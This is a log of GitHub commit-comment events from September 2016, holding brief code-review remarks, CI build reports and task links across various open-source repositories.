{"id":"4499692152","type":"CommitCommentEvent","actor":{"login":"mrmlnc"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18855945,"position":1,"line":1,"path":"extensions/vscode-node-debug","commit_id":"e1257de7ea79f3eb1da168ed5ec268eb64fae586","created_at":"2016-09-01T00:03:06Z","updated_at":"2016-09-01T00:03:06Z","body":"@roblourens, Are you sure that this should be here?"}},"created_at":"2016-09-01T00:03:06Z"}
{"id":"4499696599","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18855953,"position":null,"line":null,"path":null,"commit_id":"21e878b3ae76dbf54b651250f5230f4ac7a229b3","created_at":"2016-09-01T00:04:30Z","updated_at":"2016-09-01T00:04:30Z","body":"5626-Plant-HX-min-DT (EnergyArchmage) - i386-Windows-7-VisualStudio-12: OK (2333 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-01T00:04:30Z"}
{"id":"4499696903","type":"CommitCommentEvent","actor":{"login":"roblourens"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18855955,"position":1,"line":1,"path":"extensions/vscode-node-debug","commit_id":"e1257de7ea79f3eb1da168ed5ec268eb64fae586","created_at":"2016-09-01T00:04:35Z","updated_at":"2016-09-01T00:04:35Z","body":"Nope... removing"}},"created_at":"2016-09-01T00:04:35Z"}
{"id":"4499698903","type":"CommitCommentEvent","actor":{"login":"ivandrofly"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18855957,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-01T00:05:15Z","updated_at":"2016-09-01T00:05:15Z","body":"Good catch @marb99 :)\r\n\r\n- Work in progress.\r\n - It looks like it's been produced when sub1.Length > sub2.Length (vice-versa)."}},"created_at":"2016-09-01T00:05:15Z"}
{"id":"4499701552","type":"CommitCommentEvent","actor":{"login":"precipice"},"repo":{"name":"skylinerhq/hello-go"},"payload":{"comment":{"id":18855964,"position":5,"line":8,"path":"assets/index.html","commit_id":"46d54a723c60635dde1340fbf809558e5a764e76","created_at":"2016-09-01T00:06:07Z","updated_at":"2016-09-01T00:06:07Z","body":"I think this broke images on hello-go. Maybe a bad copy from another repo?"}},"created_at":"2016-09-01T00:06:07Z"}
{"id":"4499702326","type":"CommitCommentEvent","actor":{"login":"AlexandreSNeto"},"repo":{"name":"AlexandreSNeto/parking-app"},"payload":{"comment":{"id":18855969,"position":null,"line":null,"path":null,"commit_id":"c41d9e03e10d817817d72a34951c301bd940223f","created_at":"2016-09-01T00:06:22Z","updated_at":"2016-09-01T00:06:22Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;SmRB4Hgi&#x2F;29-incluir-mascara-de-loading-nos-blocos-carregados-dinamicamente-ao-realizar-login\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Incluir máscara de Loading nos blocos carregados dinamicamente: Ao realizar Login</a>"}},"created_at":"2016-09-01T00:06:22Z"}
{"id":"4499703266","type":"CommitCommentEvent","actor":{"login":"johardi"},"repo":{"name":"protegeproject/protege-server"},"payload":{"comment":{"id":18855973,"position":19,"line":56,"path":"src/main/java/org/protege/editor/owl/server/http/handlers/CodeGenHandler.java","commit_id":"c199a3ecd7dcdbab30e06b8ec24a60cd0dba883d","created_at":"2016-09-01T00:06:41Z","updated_at":"2016-09-01T00:06:41Z","body":"oh my goodness, I didn't see that. My bad"}},"created_at":"2016-09-01T00:06:41Z"}
{"id":"4499706221","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18855978,"position":null,"line":null,"path":null,"commit_id":"4499a505ed9c71c2fccbd746052bdffdaac1a1e0","created_at":"2016-09-01T00:07:39Z","updated_at":"2016-09-01T00:07:39Z","body":"Actually `options` is not a plain `listOf str` but this:\r\n````\r\n 47       options = mkOption {\r\n 48         default = [ \"defaults\" ];\r\n 49         example = [ \"data=journal\" ];\r\n 50         description = \"Options used to mount the file system.\";\r\n 51       } // (if versionAtLeast lib.nixpkgsVersion \"16.09\" then {\r\n 52         type = types.listOf types.str;\r\n 53       } else { \r\n 54         type = types.either types.commas (types.listOf types.str); \r\n 55         apply = x: if isList x then x else lib.strings.splitString \",\" (builtins.trace \"warning: passing a comma-separated string for filesystem options is deprecated; use a list of strings instead. This will become a hard error in 16.09.\" x);\r\n 56       });\r\n````\r\n\r\nThe version check is not `true` because the version is currently `16.09pre-git`, which is less than `16.09`. I think that conditional can be removed now (and it makes the merging work, I think)..."}},"created_at":"2016-09-01T00:07:39Z"}
{"id":"4499706369","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"TheDiamondYT1/DroidGit"},"payload":{"comment":{"id":18855982,"position":null,"line":null,"path":null,"commit_id":"6966227f027aabad6ce0e8ff3d1f74ed7baf5fbd","created_at":"2016-09-01T00:07:42Z","updated_at":"2016-09-01T00:07:42Z","body":"Random bs here. Not very good with AsyncTasks.\r\n\r\nHowever this works if you define the url and directory in in the Git.cloneRepository() method."}},"created_at":"2016-09-01T00:07:42Z"}
{"id":"4499706397","type":"CommitCommentEvent","actor":{"login":"AlexandreSNeto"},"repo":{"name":"AlexandreSNeto/parking-app"},"payload":{"comment":{"id":18855983,"position":null,"line":null,"path":null,"commit_id":"329375312d4665e3a8c2c5a72217995d376fbf17","created_at":"2016-09-01T00:07:43Z","updated_at":"2016-09-01T00:07:43Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;XD2KaORN&#x2F;30-travis-nao-gerar-imagem-de-pull-request\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Travis - Não gerar imagem de pull request</a>"}},"created_at":"2016-09-01T00:07:43Z"}
{"id":"4499707798","type":"CommitCommentEvent","actor":{"login":"gdi2290"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18855987,"position":null,"line":null,"path":null,"commit_id":"d37709ef33a54b3e1c44c6e24063b92d6f8c27f1","created_at":"2016-09-01T00:08:11Z","updated_at":"2016-09-01T00:08:11Z","body":"@zigzag95 can you make a PR"}},"created_at":"2016-09-01T00:08:11Z"}
{"id":"4499711197","type":"CommitCommentEvent","actor":{"login":"gdi2290"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18855995,"position":null,"line":null,"path":null,"commit_id":"8add16dd55279b358e1a54af3541e1698354d323","created_at":"2016-09-01T00:09:20Z","updated_at":"2016-09-01T00:09:20Z","body":"@zigzag95 can you make a pull-request?"}},"created_at":"2016-09-01T00:09:20Z"}
{"id":"4499712603","type":"CommitCommentEvent","actor":{"login":"thomas-p-wilson"},"repo":{"name":"captivationsoftware/react-sticky"},"payload":{"comment":{"id":18856001,"position":null,"line":null,"path":null,"commit_id":"ff37020d0c1f79e918e164a126ca2e6a05b800bc","created_at":"2016-09-01T00:09:50Z","updated_at":"2016-09-01T00:09:50Z","body":"I don't even remember writing this. I certainly didn't PR it. I'll clean it up and PR"}},"created_at":"2016-09-01T00:09:50Z"}
{"id":"4499717024","type":"CommitCommentEvent","actor":{"login":"AlexandreSNeto"},"repo":{"name":"AlexandreSNeto/parking-app"},"payload":{"comment":{"id":18856013,"position":null,"line":null,"path":null,"commit_id":"6c50a590bfd53d52b8714c9f4c3d5d4242d7313d","created_at":"2016-09-01T00:11:14Z","updated_at":"2016-09-01T00:11:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;us9QX8FO&#x2F;22-criar-hash-do-email-cwi-como-sugestao-de-hash-para-o-gravatar\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Criar hash do email CWI como sugestão de hash para o gravatar</a>"}},"created_at":"2016-09-01T00:11:14Z"}
{"id":"4499718758","type":"CommitCommentEvent","actor":{"login":"meonkeys"},"repo":{"name":"csats/cachet-docker"},"payload":{"comment":{"id":18856019,"position":7,"line":23,"path":"Dockerfile","commit_id":"b1dd5e0ac0466eb22f47fa2869e2d50b06d785de","created_at":"2016-09-01T00:11:46Z","updated_at":"2016-09-01T00:11:46Z","body":"Please add a `dist-upgrade`. See https://twitter.com/meonkeys/status/746432293435170816"}},"created_at":"2016-09-01T00:11:46Z"}
{"id":"4499719924","type":"CommitCommentEvent","actor":{"login":"ccramirezm"},"repo":{"name":"afgomezb/Talabarteria"},"payload":{"comment":{"id":18856024,"position":null,"line":null,"path":null,"commit_id":"faba7b59de10b5e530a7350c6bdc83cc748034fc","created_at":"2016-09-01T00:12:09Z","updated_at":"2016-09-01T00:12:09Z","body":"\r\nSe agrega documento inicial de la Talabarteria Montenegro\r\nAU:[Cristhian Ramirez]"}},"created_at":"2016-09-01T00:12:09Z"}
{"id":"4499721186","type":"CommitCommentEvent","actor":{"login":"thomas-p-wilson"},"repo":{"name":"captivationsoftware/react-sticky"},"payload":{"comment":{"id":18856029,"position":null,"line":null,"path":null,"commit_id":"ff37020d0c1f79e918e164a126ca2e6a05b800bc","created_at":"2016-09-01T00:12:30Z","updated_at":"2016-09-01T00:12:30Z","body":"To further clarify, the above solution is not, in fact, a solution. This doesn't come close to fixing the issue. The solution I worked out was more involved."}},"created_at":"2016-09-01T00:12:30Z"}
{"id":"4499721378","type":"CommitCommentEvent","actor":{"login":"hueniverse"},"repo":{"name":"hapijs/shot"},"payload":{"comment":{"id":18856030,"position":48,"line":47,"path":"lib/index.js","commit_id":"df6722906dfc9e28a0ac21fe4f2914c3dead2471","created_at":"2016-09-01T00:12:34Z","updated_at":"2016-09-01T00:12:34Z","body":"@pwarnock if you are going to act like an asshole you are going to be treated like one. No one here owes you anything."}},"created_at":"2016-09-01T00:12:34Z"}
{"id":"4499722784","type":"CommitCommentEvent","actor":{"login":"bsekisser"},"repo":{"name":"bsekisser/simavr"},"payload":{"comment":{"id":18856034,"position":90,"line":338,"path":"simavr/sim/avr_timer.c","commit_id":"a7f0de0f759be78ff4cf345e1e35c9694c454970","created_at":"2016-09-01T00:12:59Z","updated_at":"2016-09-01T00:12:59Z","body":"avr_cycle_count_t as the type here."}},"created_at":"2016-09-01T00:12:59Z"}
{"id":"4499725151","type":"CommitCommentEvent","actor":{"login":"Sunako"},"repo":{"name":"Sn0wCrack/ExHentai-Archive"},"payload":{"comment":{"id":18856039,"position":null,"line":null,"path":null,"commit_id":"dd24e873bf30a33ccb6637e89359995d3e5414bc","created_at":"2016-09-01T00:13:41Z","updated_at":"2016-09-01T00:13:41Z","body":"This doesn't quite work as expected for now as it continually mentions and floods the log if you have a lot of deleted galleries. Can you revert this commit for now? I did it locally, but it is a bit broken at the moment.\r\n\r\nAlso line 67 needs  ` Log:debug` to have a second colon for it to work."}},"created_at":"2016-09-01T00:13:41Z"}
{"id":"4499728298","type":"CommitCommentEvent","actor":{"login":"basarat"},"repo":{"name":"TypeStrong/tsify"},"payload":{"comment":{"id":18856042,"position":null,"line":null,"path":null,"commit_id":"7fafdb7b9e557504de54c1adb29171b736347923","created_at":"2016-09-01T00:14:38Z","updated_at":"2016-09-01T00:14:38Z","body":"> Could ts.sys be passed as the host instead\r\n\r\nYes please. This (tsify) was my first attempt as this requirement only came with ts 2.x nightlies and I should have just passed in `ts.sys`.\r\n\r\n> Isn't that what you say you are doing elsewhere?\r\n\r\nThe elsewhere code : https://github.com/alm-tools/alm/blob/ca90b703424e18390b0756784f05c2ea4c1a5702/src/server/workers/lang/core/tsconfig.ts#L262 I do indeed just pass in ts.sys :rose: "}},"created_at":"2016-09-01T00:14:38Z"}
{"id":"4499732389","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18856053,"position":null,"line":null,"path":null,"commit_id":"e38ea8882941ebf45a48a84e82af37117e68ce1b","created_at":"2016-09-01T00:15:51Z","updated_at":"2016-09-01T00:15:51Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e38ea8882941ebf45a48a84e82af37117e68ce1b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e38ea8882941ebf45a48a84e82af37117e68ce1b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e38ea8882941ebf45a48a84e82af37117e68ce1b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-01T00:15:51Z"}
{"id":"4499735061","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18856058,"position":null,"line":null,"path":null,"commit_id":"e38ea8882941ebf45a48a84e82af37117e68ce1b","created_at":"2016-09-01T00:16:41Z","updated_at":"2016-09-01T00:16:41Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e38ea8882941ebf45a48a84e82af37117e68ce1b-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-01T00:16:41Z"}
{"id":"4499735670","type":"CommitCommentEvent","actor":{"login":"deekoder"},"repo":{"name":"minio/doctor"},"payload":{"comment":{"id":18856060,"position":null,"line":null,"path":null,"commit_id":"66a64c56c257b36f7782374e6c5b1cbe195f7be1","created_at":"2016-09-01T00:16:53Z","updated_at":"2016-09-01T00:16:53Z","body":"👍 "}},"created_at":"2016-09-01T00:16:53Z"}
{"id":"4499735834","type":"CommitCommentEvent","actor":{"login":"andela-rekemezie"},"repo":{"name":"AdeRalph/inverted-index"},"payload":{"comment":{"id":18856062,"position":null,"line":null,"path":null,"commit_id":"c04438bb69962fdfae65fd4ae826412e90a64450","created_at":"2016-09-01T00:16:57Z","updated_at":"2016-09-01T00:16:57Z","body":"You would want to clean your git history after cloning a boilerplate and then set your `remote url.`"}},"created_at":"2016-09-01T00:16:57Z"}
{"id":"4499736777","type":"CommitCommentEvent","actor":{"login":"pwarnock"},"repo":{"name":"hapijs/shot"},"payload":{"comment":{"id":18856066,"position":48,"line":47,"path":"lib/index.js","commit_id":"df6722906dfc9e28a0ac21fe4f2914c3dead2471","created_at":"2016-09-01T00:17:14Z","updated_at":"2016-09-01T00:17:14Z","body":"Whoa Eran. I don't know what I did to be called that. I have a great deal of respect for you and the project and would like to see it succeed. If I overstepped by asserting my opinion, not an entitlement, I'm sorry."}},"created_at":"2016-09-01T00:17:14Z"}
{"id":"4499737214","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire-jlibtorrent"},"payload":{"comment":{"id":18856068,"position":10,"line":258,"path":"swig/libtorrent.h","commit_id":"6de4ab1352583dfc71a0fa37732b8a5ffda11c94","created_at":"2016-09-01T00:17:22Z","updated_at":"2016-09-01T00:17:22Z","body":"This only works with clang, it's intended to be available only in android, but I can test it on osx, much better "}},"created_at":"2016-09-01T00:17:22Z"}
{"id":"4499737665","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Webizen2"},"payload":{"comment":{"id":18856071,"position":21,"line":26,"path":"src/main/java/com/morphanone/webizen2/Webizen2.java","commit_id":"9076ea178badaf143f4372cbdbfc97d022df2d26","created_at":"2016-09-01T00:17:31Z","updated_at":"2016-09-01T00:17:31Z","body":"Aside from the `because new tests show it to be faster` being a hilarious statement for multiple reasons, it's much worse code style. I am strongly against this change >:("}},"created_at":"2016-09-01T00:17:31Z"}
{"id":"4499738774","type":"CommitCommentEvent","actor":{"login":"mathiasvr"},"repo":{"name":"feross/webtorrent-desktop"},"payload":{"comment":{"id":18856075,"position":null,"line":null,"path":null,"commit_id":"451d457426ebe478079b9d7f412f97974907f084","created_at":"2016-09-01T00:17:55Z","updated_at":"2016-09-01T00:17:55Z","body":"Might there be some clever i18n way to do this? @yciabaud  "}},"created_at":"2016-09-01T00:17:55Z"}
{"id":"4499739185","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18856076,"position":null,"line":null,"path":null,"commit_id":"2b4c2874629846d1a68ac52677a076d66cc1cfed","created_at":"2016-09-01T00:18:03Z","updated_at":"2016-09-01T00:18:03Z","body":"I'm afraid this is too much anyway... Suggestions welcome..."}},"created_at":"2016-09-01T00:18:03Z"}
{"id":"4499739229","type":"CommitCommentEvent","actor":{"login":"ash1sh95"},"repo":{"name":"ash1sh95/ashish-projects"},"payload":{"comment":{"id":18856077,"position":2,"line":2,"path":"README.md","commit_id":"6e25b5173901a8b0425a0eba40f9532fa74c5e95","created_at":"2016-09-01T00:18:04Z","updated_at":"2016-09-01T00:18:04Z","body":"my sentiment analysis project done using nltk corpora movie review dataset"}},"created_at":"2016-09-01T00:18:04Z"}
{"id":"4499739357","type":"CommitCommentEvent","actor":{"login":"douwenlu"},"repo":{"name":"douwenlu/world"},"payload":{"comment":{"id":18856079,"position":2,"line":2,"path":"README.md","commit_id":"d50c24e909e86a2229b8a893a8469e7df9080842","created_at":"2016-09-01T00:18:07Z","updated_at":"2016-09-01T00:18:07Z","body":"再次让这个世界充满爱"}},"created_at":"2016-09-01T00:18:07Z"}
{"id":"4499740676","type":"CommitCommentEvent","actor":{"login":"tedjp"},"repo":{"name":"facebook/wangle"},"payload":{"comment":{"id":18856083,"position":null,"line":null,"path":null,"commit_id":"2c55f2bdcc84216c26c6058e754b874c3029e39f","created_at":"2016-09-01T00:18:31Z","updated_at":"2016-09-01T00:18:31Z","body":"I have a fix for Proxygen in the works."}},"created_at":"2016-09-01T00:18:31Z"}
{"id":"4499740898","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Webizen2"},"payload":{"comment":{"id":18856084,"position":46,"line":46,"path":"src/main/java/com/morphanone/webizen2/events/http/HttpPostRequestScriptEvent.java","commit_id":"9076ea178badaf143f4372cbdbfc97d022df2d26","created_at":"2016-09-01T00:18:35Z","updated_at":"2016-09-01T00:18:35Z","body":"Is this intentionally double-spaced?"}},"created_at":"2016-09-01T00:18:35Z"}
{"id":"4499741994","type":"CommitCommentEvent","actor":{"login":"cartant"},"repo":{"name":"TypeStrong/tsify"},"payload":{"comment":{"id":18856091,"position":null,"line":null,"path":null,"commit_id":"7fafdb7b9e557504de54c1adb29171b736347923","created_at":"2016-09-01T00:18:57Z","updated_at":"2016-09-01T00:18:57Z","body":"No worries. I'll replace it. Thanks."}},"created_at":"2016-09-01T00:18:57Z"}
{"id":"4499744686","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"DecimalMan/dkp"},"payload":{"comment":{"id":18856099,"position":null,"line":null,"path":null,"commit_id":"4febd05f36e0602a9e1434959eed0d240a6c7b23","created_at":"2016-09-01T00:19:49Z","updated_at":"2016-09-01T00:19:49Z","body":"Hehe dude read the rest of my message, the \"crazy\" comment was in jest.  I am working on a similiar project for the s4 ; ) the joke was that we're all crazy : P"}},"created_at":"2016-09-01T00:19:49Z"}
{"id":"4499745235","type":"CommitCommentEvent","actor":{"login":"Morphan1"},"repo":{"name":"DenizenScript/Webizen2"},"payload":{"comment":{"id":18856104,"position":46,"line":46,"path":"src/main/java/com/morphanone/webizen2/events/http/HttpPostRequestScriptEvent.java","commit_id":"9076ea178badaf143f4372cbdbfc97d022df2d26","created_at":"2016-09-01T00:20:01Z","updated_at":"2016-09-01T00:20:01Z","body":"I figured it was easier to read"}},"created_at":"2016-09-01T00:20:01Z"}
{"id":"4499745955","type":"CommitCommentEvent","actor":{"login":"hueniverse"},"repo":{"name":"hapijs/shot"},"payload":{"comment":{"id":18856106,"position":48,"line":47,"path":"lib/index.js","commit_id":"df6722906dfc9e28a0ac21fe4f2914c3dead2471","created_at":"2016-09-01T00:20:15Z","updated_at":"2016-09-01T00:20:15Z","body":"\"I made an incorrect assumption that modules in the hapijs/ namespace are cohesively maintained\" sounds like a dig against the maintainer of some modules. If that wasn't intended, please remove that comment. I'll gladly remove my response. I am being aggressively protective of people who volunteer their time to this community."}},"created_at":"2016-09-01T00:20:15Z"}
{"id":"4499746391","type":"CommitCommentEvent","actor":{"login":"Morphan1"},"repo":{"name":"DenizenScript/Webizen2"},"payload":{"comment":{"id":18856109,"position":21,"line":26,"path":"src/main/java/com/morphanone/webizen2/Webizen2.java","commit_id":"9076ea178badaf143f4372cbdbfc97d022df2d26","created_at":"2016-09-01T00:20:24Z","updated_at":"2016-09-01T00:20:24Z","body":"The package has my name in it >:("}},"created_at":"2016-09-01T00:20:24Z"}
{"id":"4499747720","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18856111,"position":9,"line":20,"path":"en/source/packet_lib.rst","commit_id":"9de74a9ac2f144ec9cf2e12367ce984833b30a54","created_at":"2016-09-01T00:20:50Z","updated_at":"2016-09-01T00:20:50Z","body":"ご指摘どおり`API Reference`では意味が広いため、\r\n`Packet library API Reference`に修正します。\r\n"}},"created_at":"2016-09-01T00:20:50Z"}
{"id":"4499749939","type":"CommitCommentEvent","actor":{"login":"andela-rekemezie"},"repo":{"name":"AdeRalph/inverted-index"},"payload":{"comment":{"id":18856117,"position":33,"line":29,"path":"spec/inverted-index-test.js","commit_id":"d5889dd5df66f0fbf0eb4f6b75bb8ce8f97f9e32","created_at":"2016-09-01T00:21:35Z","updated_at":"2016-09-01T00:21:35Z","body":"***Code Quality - critical***\r\nYou don't need a `beforeEach` for this test as it adds some overhead. `beforeEach` block runs for every `spec` of the `test suite`."}},"created_at":"2016-09-01T00:21:35Z"}
{"id":"4499751418","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Webizen2"},"payload":{"comment":{"id":18856120,"position":21,"line":26,"path":"src/main/java/com/morphanone/webizen2/Webizen2.java","commit_id":"9076ea178badaf143f4372cbdbfc97d022df2d26","created_at":"2016-09-01T00:22:06Z","updated_at":"2016-09-01T00:22:06Z","body":"That's a ridiculous non-response. Want I should change the package to match the Denizen2 standard package names and better mark it as a Denizen2 official addon? <3"}},"created_at":"2016-09-01T00:22:06Z"}
{"id":"4499751959","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"DecimalMan/dkp"},"payload":{"comment":{"id":18856123,"position":null,"line":null,"path":null,"commit_id":"4febd05f36e0602a9e1434959eed0d240a6c7b23","created_at":"2016-09-01T00:22:17Z","updated_at":"2016-09-01T00:22:17Z","body":"Also my first love was a skyrocket, I a actually have been studying ways to extend sultanxda's work on an updated 3.4 kernel for the skyrocket/hercules."}},"created_at":"2016-09-01T00:22:17Z"}
{"id":"4499754819","type":"CommitCommentEvent","actor":{"login":"Echelon9"},"repo":{"name":"empirical-org/Empirical-Core"},"payload":{"comment":{"id":18856132,"position":null,"line":null,"path":null,"commit_id":"16013c19f6ca6a6f1c4eef0186cee7882a8ffeb7","created_at":"2016-09-01T00:23:18Z","updated_at":"2016-09-01T00:23:18Z","body":"This change just modifies the spec test, not the actual interface text. As is, explains why it caused a regression spec to trigger.\r\nI can make the modifications fairly easy to resolve both the desired UI change and fix the spec if you'd like?"}},"created_at":"2016-09-01T00:23:18Z"}
{"id":"4499760651","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18856147,"position":null,"line":null,"path":null,"commit_id":"9de74a9ac2f144ec9cf2e12367ce984833b30a54","created_at":"2016-09-01T00:25:16Z","updated_at":"2016-09-01T00:25:16Z","body":"口頭でご指摘頂きましたが、以下の文は説明が冗長すぎるため削除します。\r\n```\r\nSo we must search the details page of each protocol from the top page of Ryu documents.\r\n```\r\n"}},"created_at":"2016-09-01T00:25:16Z"}
{"id":"4499764714","type":"CommitCommentEvent","actor":{"login":"grp"},"repo":{"name":"facebook/xcbuild"},"payload":{"comment":{"id":18856163,"position":56,"line":217,"path":"Libraries/libbom/Sources/bom_tree.c","commit_id":"596b529f861d17dd9b69832d90d3db77395f8ded","created_at":"2016-09-01T00:26:41Z","updated_at":"2016-09-01T00:26:41Z","body":"Was this deemed unnecessary because the entry index is always at the end of `entry`? If so, wouldn't this be a no-opa anyway?"}},"created_at":"2016-09-01T00:26:41Z"}
{"id":"4499765943","type":"CommitCommentEvent","actor":{"login":"andela-rekemezie"},"repo":{"name":"AdeRalph/inverted-index"},"payload":{"comment":{"id":18856165,"position":41,"line":30,"path":"spec/inverted-index-test.js","commit_id":"7de2bc4a2d7eaf96dd75ceb0f5d3c54534b77521","created_at":"2016-09-01T00:27:08Z","updated_at":"2016-09-01T00:27:08Z","body":"***Nitpick - Code Quality***\r\n`beforeEach` hook not necessary in this case. It runs for each spec and that means some overhead cost.\r\nYour object instantiation and function calls can be done without it."}},"created_at":"2016-09-01T00:27:08Z"}
{"id":"4499772740","type":"CommitCommentEvent","actor":{"login":"marcsalem"},"repo":{"name":"facebook/xcbuild"},"payload":{"comment":{"id":18856176,"position":56,"line":217,"path":"Libraries/libbom/Sources/bom_tree.c","commit_id":"596b529f861d17dd9b69832d90d3db77395f8ded","created_at":"2016-09-01T00:29:21Z","updated_at":"2016-09-01T00:29:21Z","body":"This was always inserting new items at the start of the memory block and shifting everything back. Seemed like a waste, and resulted in reversing the ordering when traversed later."}},"created_at":"2016-09-01T00:29:21Z"}
{"id":"4499779690","type":"CommitCommentEvent","actor":{"login":"Uppermost"},"repo":{"name":"OpenNos/OpenNos"},"payload":{"comment":{"id":18856200,"position":null,"line":null,"path":null,"commit_id":"589a7dbfe0735fd4e865a74a6fc69341e9735ed5","created_at":"2016-09-01T00:31:39Z","updated_at":"2016-09-01T00:31:39Z","body":"Problem here ?"}},"created_at":"2016-09-01T00:31:39Z"}
{"id":"4499784887","type":"CommitCommentEvent","actor":{"login":"laymarty"},"repo":{"name":"laymarty/Electiva-II"},"payload":{"comment":{"id":18856207,"position":null,"line":null,"path":null,"commit_id":"3b46e687adfce3c200febc3543f377993379b12a","created_at":"2016-09-01T00:33:27Z","updated_at":"2016-09-01T00:33:27Z","body":"[PropuestaFoodMap.docx.docx](https://github.com/laymarty/Electiva-II/files/448554/PropuestaFoodMap.docx.docx)\r\n"}},"created_at":"2016-09-01T00:33:27Z"}
{"id":"4499785585","type":"CommitCommentEvent","actor":{"login":"laymarty"},"repo":{"name":"laymarty/Electiva-II"},"payload":{"comment":{"id":18856211,"position":null,"line":null,"path":null,"commit_id":"3b46e687adfce3c200febc3543f377993379b12a","created_at":"2016-09-01T00:33:40Z","updated_at":"2016-09-01T00:33:40Z","body":"Propuesta en WORD"}},"created_at":"2016-09-01T00:33:40Z"}
{"id":"4499786770","type":"CommitCommentEvent","actor":{"login":"tedjp"},"repo":{"name":"facebook/wangle"},"payload":{"comment":{"id":18856213,"position":null,"line":null,"path":null,"commit_id":"2c55f2bdcc84216c26c6058e754b874c3029e39f","created_at":"2016-09-01T00:34:03Z","updated_at":"2016-09-01T00:34:03Z","body":"@mlabour \r\nFix for Proxygen submitted: https://github.com/facebook/proxygen/pull/114\r\nI might change the way it works but that should get you up-and-running for now."}},"created_at":"2016-09-01T00:34:03Z"}
{"id":"4499786811","type":"CommitCommentEvent","actor":{"login":"laymarty"},"repo":{"name":"laymarty/Electiva-II"},"payload":{"comment":{"id":18856214,"position":null,"line":null,"path":null,"commit_id":"3b46e687adfce3c200febc3543f377993379b12a","created_at":"2016-09-01T00:34:04Z","updated_at":"2016-09-01T00:34:04Z","body":"Propuesta en word"}},"created_at":"2016-09-01T00:34:04Z"}
{"id":"4499787735","type":"CommitCommentEvent","actor":{"login":"grp"},"repo":{"name":"facebook/xcbuild"},"payload":{"comment":{"id":18856218,"position":56,"line":217,"path":"Libraries/libbom/Sources/bom_tree.c","commit_id":"596b529f861d17dd9b69832d90d3db77395f8ded","created_at":"2016-09-01T00:34:22Z","updated_at":"2016-09-01T00:34:22Z","body":"Good fix!"}},"created_at":"2016-09-01T00:34:22Z"}
